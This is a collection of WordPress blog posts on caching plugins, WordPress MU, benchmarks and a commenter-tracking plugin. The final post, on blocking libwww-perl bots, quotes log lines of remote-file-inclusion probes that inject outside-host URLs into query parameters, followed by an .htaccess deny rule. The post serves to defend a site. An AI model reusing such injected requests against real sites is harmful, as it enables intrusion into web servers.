WIP: Blog Voyeur and Custom Akismet screenshots

Here’s a sneak preview of some stuff I’m working on, besides WP Super Cache and WordPress MU.

First of all, there’s my Blog Voyeur plugin. It’s a visitor logging plugin like many other ones, but this one only records hits from users who have left comments here. The screenshot below is what you see in the backend listing page. I took out the names of the users for privacy reasons but so far it’s worked quite well. I’m not sure yet if this plugin will see the light of day. After discussing this with Mark he came up with some possible uses for it. Inventive fellow is he. Comments in brackets by me.

“When I made that post yesterday criticising Matt, I wondered if he would look at it. Well now I know he did… and because he didn’t comment he’s guilty…” (paranoid?)

Match your cookie thing with crazyegg 🙂 (excessive?)

Have a popup – “Hi Matt!” (annoying?)

See returning user, see no comments so send them an email asking for their views on the posts they did not comment on. (obsessive?)

voyeur-list-t.gif

I mentioned this second plugin already. It’s a modified version of Akismet. You can download it yourself if you want to play with it. If someone else wants to take it further feel free to. It’s all GPL code. I’m posting a screenshot because it’s amazing to see so much spam from one IP address in only a few days. Just goes to show what a good job Akismet does.

akismet numbers

A Simply Silly WordPress URL

I’m not sure why I noticed this protest sticker. It’s stuck to a lamp post on Patrick Street, Cork but maybe it was the typo in the URL that triggered my subconscious. One thing I can be certain of is that WordPress.org is not taking sides in any conflict of any sort! GPL software can be used by anyone just so long as they stick to the agreement with which they accepted the software.

Silly Stupid Typo

As expected, palestinesolidarityproject.wordpress.com points at an old blog of theirs as they have now moved to their own server at palestinesolidarityproject.org.

Glossing over the .org mistake for a minute, why do people still put the “www.” in front of long-winded urls? It gets stripped by WordPress.com anyway. Why not put “http://” there instead? Makes more sense to me. Three cheers for the no-www movement!

So, have you seen any glaring typos on posters, fliers, stickers or blogs that made you look twice? Today’s link post doesn’t count. I did that on purpose to make a point. Sure. 🙂

100,000 page views in 5 minutes

Now, that’s why you can’t believe benchmarks. Sure, this server was able to serve 100,000 page views in 282 seconds but:

  • Requests were made from a VPS in the same datacenter. No need to worry about slow clients, or maintaining network connections to many remote clients.
  • I used Litespeed Web Server instead of Apache.
  • Was it realistic? Even a digg that sends you say, 8,000 page views in an hour, isn’t going to exercise your server that much unless your page is chock full of graphics, css and Javascript. (oh wait, web 2.0 ..)

So, Litespeed’s webserver is the one to go for? Maybe not. I can’t for the life of me get compression of the static cache working. When I do, the browser tries to display the gzipped data directly. I can enable the webserver’s gzip function but from tests I don’t think it caches the resulting gzipped file. (btw – mod_deflate, the Apache2 module that does the same thing suffers from this problem too!) Later – testing this again. Litespeed allows you to set a a gzip cache directory. For normal traffic it’s worth doing so pages load faster.
The mod_gzip site is a great resource if you want to find out more about compressing HTTP content.

How did Apache cope? I was serving 100 concurrent requests and Apache didn’t cope too well. It did serve all the file requests eventually but the load average jumped to just over 50 and the site was unavailable to anyone else. It’ll serve 1000 requests for a static file fine, even 10,000 too, but under constant load the server starts to wilt. Unless you have the RAM to keep enough Apache child processes going all the time you’re going to start swapping.
Meanwhile, Litespeed hardly caused a blip in the server’s load average. I’m quite impressed and I’m running it now. It’s also what powers WordPress.com. Even if you’re not using WordPress, you should look at alternatives to Apache.

This leads me nicely on to announce WP Super Cache 0.4! Download it here!

Major new features include:

  • A “lock down” button. I like to think of this as my “Digg Proof” button. This basically prepares your site for a heavy digging or slashdotting. It locks down the static cache files and doesn’t delete them when a new comment is made.
  • Automatic updating of your .htaccess file. (Backup your .htaccess before installing the plugin!)
  • Don’t super cache any request with GET parameters. You really need to use fancy permalinks now.
  • WordPress search works again.
  • Better version checking of wp-cache-config.php and advanced-cache.php in case you’re using an old one.
  • Better support for Microsoft Windows.
  • Properly serve cached static files on Red Hat/Cent OS systems or others that have an entry for gzip in /etc/mime.types.
  • The Reject URI function works again and now uses regular expressions!

Support queries should go to the forum. Make sure your posts are tagged “wp-super-cache”, but if you post from that link they will.

How well did Super Cache handle the digg?

I must admit making the front page of Digg.com wasn’t the nail biting experience I expected.

$ grep "GET /2007/11/05/wordpress-super-cache-01/" access.log.1|grep digg -c
4686

digg.com

My Super Cache announcement only drew 4686 visitors which is an ultra-light Digg. The Digg page for the post received 808 diggs as of a few minutes ago which is great. Thank you for voting! Judging by the sheer number of comments on that post, there’s a lot of interest out there in the plugin.
What about traffic graphs? The spike at the end of the first graph is my nightly Backuppc service kicking in. The second is from Google Analytics. My server could certainly handle a lot more traffic!

digg.com traffic
analytics-digg

A quick look at my uptime shows the server hardly broke a sweat dealing with the extra traffic except where some idiot spammer bots tried to download my archives a few times. Unfortunately the first time that happened the archives weren’t cached and the load climbed.

For maximum performance, download Xcache and install it. The Xcache WordPress plugin uses Xcache to cache data structures and makes WordPress much faster, even if you don’t use any other caching tool.

WordPress Super Cache 0.1

It’s time to lift the veil of secrecy on my latest project. With help from friends who diligently tested and reported bugs on this I can now present version 0.1 of WP Super Cache!

It is an extensive modification of the famous WP-Cache 2 plugin by Ricardo Galli Granada. This plugin creates static html files that are served directly by the webserver as well as the usual WP-Cache data files. It also goes one step further fixing a couple of bugs, adding some hooks and new features and making WP-Cache more flexible.
From the plugin page, here are some of the major changes and updates:

  • A plugin and hooks system. A common complaint with WP Cache was that hacking was required to make it work nicely with other plugins. Now you can take advantage of the simple plugin system built in to change how or when pages are cached. Use do_cacheaction() and add_cacheaction() like you would with WordPress hooks. Plugins can add their own options to the admin page too.
  • Works well with WordPress MU in VHOST or non-VHOST configuration. Each blog’s cache files are identified to improve performance.
  • Normal WP-Cache files are now split in two. Meta files go in their own directory making it much faster to scan and update the cache.
  • Includes this WP-Cache and protected posts fix.
  • Automatically disable gzip compression in WordPress instead of dying.
  • As Akismet and other spam fighting tools have improved, the cache will only be invalidated if a comment is definitely not spam.

If your server is struggling to cope with the traffic your site gets this plugin could be just right for you. If your site regularly gets hit by spikes of traffic like a digging or slashdotting it’s definitely the right choice, and even for everyday use, you may very well notice your webserver is a little bit more responsive.

I contacted Ricardo last week and sent him on an earlier copy of the plugin but I haven’t heard from him yet however. I’d love to know what he thinks of my modifications!

Update! this post has been dugg, please digg it and we can really test the cache out!

Nov 6th: WP Super Cache 0.2 is out! I think all the bugs mentioned below are now fixed. I applied Tummbler’s patch (from Elliott and Reiner) that enables gzip compression of the WP-Cache data files and fixes feed content types.
Please note: PHP’s internal zlib compression must be disabled for this to work. Look in your php.ini for the zlib.output_compression and zlib.output_compression_level directives and comment them out by placing a “;” at the start of each line.

Check the plugin page above for the download link.

WordPress MU 1.3

Finally, after what seems like an age, the download page has been updated with the new WordPress MU 1.3 release.

WordPress MU is a multi-blog version of WordPress which runs on millions of blogs all over the world. The major blogging site, WordPress.com uses it as do many others.

This is a sync of WordPress 2.3.1 which includes native tagging support as well as many bug and security fixes.
WordPress MU specific features include:

  • Better admin controls for the signup page. It can be disabled in various ways.
  • Upload space functions have been fixed.
  • The signup form is now hidden from search engines which will help avoid certain types of spamming.
  • Profile page now allows you to select your primary blog.
  • Database tables are now UTF-8 from the start.
  • If you’re using virtual hosts, the main blog doesn’t live at /blog/ any more.
  • The WordPress importer now assigns posts to other users on a blog.
  • A taxonomy sync script is included in mu-plugins but commented out. It hasn’t been tested much but if your site has many hundreds of blogs it might be worth spending some time on a test server. Replicate normal traffic patterns and see if the server can cope with the upgrade process. If not, then look at the sync script, uncomment it and iterate over all your blogs with a script.

Developers – get_blog_option() will never return the string “falsevalue” again. That bug has been squished and it now returns the boolean value false.

This forum thread on the new release is worth watching. Any problems will surface their first.

Thanks to:
Everyone on the MU forums for your help in tracking down bugs.
ktlee and momo360modena for all your patches. They’re very welcome and a huge help.

Extensive documentation is being built up on the WordPress MU Codex by many people, including Martin Cleaver who bugged me about moving the docs from Trac and about telling everyone that documentation help is always needed.

What time is it WordPress?

Daylight Saving Time (DST) kicked in this morning in Ireland, the UK and many other parts of the world when the clocks went back 1 hour. The US is next week from what I remember. If your server is using UTC time, check Options->General, the “Times in the weblog should differ by” textbox in your blog and adjust accordingly!

wordpress-time.png

Here’s a discussion on the WordPress.com forums about the issue from last year and I found this extend idea that has already been implemented in the Time Zone plugin, but it only works on UNIX-like systems and if you’re not using PHP’s safe mode.

PHP5 has the date_default_timezone_set function, but not enough hosts are using PHP5 to make that a universal choice. It would be nice if all this was done automatically, but hopefully with the further adoption of PHP5 that will happen eventually.

And don’t forget to check your other gadgets, especially digital cameras. I doubt many of them know anything about timezones!

Howto: WP-Cache and protected posts

If you use protected posts on your WordPress blog you may have noticed that WP-Cache doesn’t cache those password protected posts properly. I didn’t know this, but James Farmer did so I went looking and found a fix.

In the plugins/wp-cache/ directory, open wp-cache-phase1.php in your favourite text editor and look for the following line:

if (preg_match(“/^wordpress|^comment_author_email_/”, $key)) {

Replace that line with this one:

if (preg_match(“/^wp-postpass|^wordpress|^comment_author_email_/”, $key)) {

Save and upload the file if necessary and clear your cache. Password protect posts should be cached properly now!

Ironically, this post wasn’t being cached by WP-Cache because the url contains the string “wp-“. Here’s how to fix that bug. Open wp-cache-phase2.php and look for the following line:

if (strlen($expr) > 0 && strstr($uri, $expr))

Change it to read:

if (strlen($expr) > 0 && substr( $uri, 1, strlen($expr) ) == $expr )

Phew. This post is now cached.

Keep the libwww-perl bots out

If you look through your server logs you’ll probably notice more than a few requests like these:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? … “libwww-perl/5.805”
GET /2004/02/18/smoking-ban-is-on-the-way/trackback/ … “libwww-perl/5.805”
GET /2004/02/18/irish-car-tax-list/trackback/ … “libwww-perl/5.805”
GET /tag/php//tags.php?BBCodeFile=http://drpepper.gigacities.net/id.txt? … “libwww-perl/5.579”

If you do find them (grep libwww-perl access_log) then add the following code to your .htaccess file. On a WordPress site this file should already be there if you’re using fancy permalinks.

RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} libwww-perl.*
RewriteRule .* – [F,L]

Change “RewriteBase /” to suit your own base directory.

There are other bad guys out there. This page has a long list of rewrite rules to keep out all sorts of bots! I haven’t looked through them myself so YMMV if you try them.

This has the added benefit of reducing load on your server. WordPress sites are dynamically generated. This is great under normal circumstances but when you get a flood of requests it can place an unnecessary load on your site. WP-Cache helps a lot but these rules will stop them dead at the front door!

PS. ‘Course, if you depend on a libwww-perl application then don’t add this rule or you may give yourself a headache trying to figure out why things stopped working!